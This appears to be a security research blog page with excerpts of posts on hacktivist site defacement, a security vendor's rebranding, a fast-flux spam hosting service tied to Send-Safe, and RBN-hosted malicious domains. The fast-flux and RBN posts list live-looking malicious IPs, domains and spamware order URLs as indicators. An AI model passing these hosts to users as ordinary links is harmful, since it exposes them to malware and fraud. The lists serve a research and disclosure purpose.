Lots of data to cross-check for sure. Best of all - it's a real time example of the people's information warfare concept, virtual PSYOPS to be precise. Defacing sites using automated vulnerability scanning and exploitation tools is one thing, embedding malware on the defaced sites is totally another, and while we've been witnessing the emergence of embedded malware during 2007, it's questionable whether it's done for the aggregation of infected hosts into botnets only, or a specific hacktivist cause for instance.

Continue reading →

Rebranding a Security Vendor

Rebranding by itself is a tricky process, which if not coordinated at all levels of the enterprise could result in severe channel conflicts damaging the brand's image, and increasing the risk of confused positioning.

PandaSoftware's recent rebranding to PandaSecurity comes as a smoothly executed example of the process, as it needed to take advantange of the entire marketing toolset in order to communicate their new vision, mostly a sound repositioning strategy emphasizing that the company's core competency is not software in general, but IT security. As in every other marketing campaign aiming to achieve such effect, the business lingo used affects the prospective audience of the campaign, be it the U.S or the EMEA markets or even better in respect to globalization - try to influence both with a clear vision, namely that "Prevention is better than the cure". The question from a marketing perspective always remains - is it a brand with a mission, or is it a mission with a brand, and isn't the second a better socially oriented positioning than the standard practice?

Meanwhile, here's another proof that building a solid brand results in sustained brand equity, thereby attracting potential acquirers' interest which is the case with McAfee's recent acquisition of ScanAlert for $51M. What they're buying is not the technology behind the company, a daily managed penetration testing process, but ScanAlert's brand and clients list.

Related posts:

Microsoft's Forefront Ad Campaign

Microsoft's OneCare Penetration Pricing Strategy

Microsoft in the Information Security Market

Overachieving Technology Companies

China's Information Security Market

Spotting valuable investments in the information security market

Look who's gonna cash for evaluating the maliciousness of the Web?

Taking Down Phishing Sites - a Business Model?

Take this Malicious Site Down - Processing order..

Budget Allocation Myopia and Prioritizing Your Expenditures

Valuing Security and Prioritizing Your Expenditures

Continue reading →

Managed Fast-Flux Provider

Vertical integration in the spamming market means you don't just provide potential customers lists in the form of harvested emails, the infrastructure for the mass mailing consisting of hundreds of infected PCs, but also, occupying emerging market segments such as the need for increasing the overal time a spam/phishing campaign remains online, as well as make it hard to traceback courtesy of fast-flux networks. And so, the IP that was hosting the spam/phishing campaign in the last 5 minutes is now clean and has nothing to do with it.

There's an interesting tactic phishers and spammers are starting to use, next to the pure fast-flux at the DNS level I covered in a previous post, and that is a dynamically serving the data from multiple locations per web session. Take meds247.org for instance. Who's providing meds247.org's fast-flux infrastructure? In the first example we had "a dynamic subdomain generating spamming host running a proxy server every time the central campaign URL gets refreshed via an obfuscated javascript". The javascript is now gone, but the content (dynamic per page view) is obtained from dynamic locations behind a proxy. For instance, while the domain responds to 78.94.45.76, the content in the session is obtained from 72.2.16.236:8088/vti_sys. And despite that the DNS records and the content IPs change the vti_sys directory structure doesn't, a fax fluxing service that I feel Send-Safe.com branded as "Your Own Proxies" and as it looks like, use on for their own order processing next to maintaining a rogue certificate authority for anyone who dares to shop there :

216.153.170.110:8088/vti_sys/order.php?product=ssnp
216.153.170.110:8088/vti_sys/order.php?product=sspc
216.153.170.110:8088/vti_sys/order.php?product=sse1
216.153.170.110:8088/vti_sys/order.php?product=ssalonesite
67.118.79.234:8088/vti_sys/order.php?product=sslm

More info about Send-Safe.com, a spamware vendor that's vertically integrating in the spamming market. Continue reading →

Detecting and Blocking the Russian Business Network

Bleeding Edge Threats recently announced the release of some very handy RBN blocking/detecting rulesets :

"Call these hosts what you like, we see a large amount of hostile activity from these nets, and get little to no abuse response for takedown, Do what you will with this information."

Remember RBN's fake anti virus and anti spyware software? The list is getting bigger with another 20 additions again hosted on RBN IPs exposed by the RBNExploit blog.

Meanwhile you may be also be interested in how does an abuse request get handled at the RBN? Deceptively of course. Each and every domain or IP that has been somehow reported malicious to them, not once but numerous times by different organizations starts serving a fake account suspended message like the following malicious domains hosted at the RBN do :

"This Account Has Been Suspended For Violation Of Hosting Terms And Conditions. Please contact the billing/support department as soon as possible"

- superengine.cn (81.95.149.181) - fake account suspended message, no malicious script at front page but within the domain

- eliteproject.cn (81.95.149.124) - fake account suspended message, no malicious script at front page but within the domain

- space-sms.info (200.115.174.248) - fake account suspended, loads the malicious takenames.cn

- lem0n.info - (200.115.174.248) fake account suspended message, obfuscated javascript to bl0cker.info

- worldtraff.cn (200.115.174.248) - fake account suspended message, loads bl0cker.info and takenames.cn

- takenames.cn (58.65.239.66) - fake of eValid web testing solution, interacting with all of these domains

Dots, dots, dots, 58.65.239.66 or takenames.cn for the time being, used to resolve to goodtraff.biz in the past, another RBN operation we know from the Bank of India hack, where the second RBN IP was used in the most recent Possibility Media's Malware Fiasco as well. Continue reading →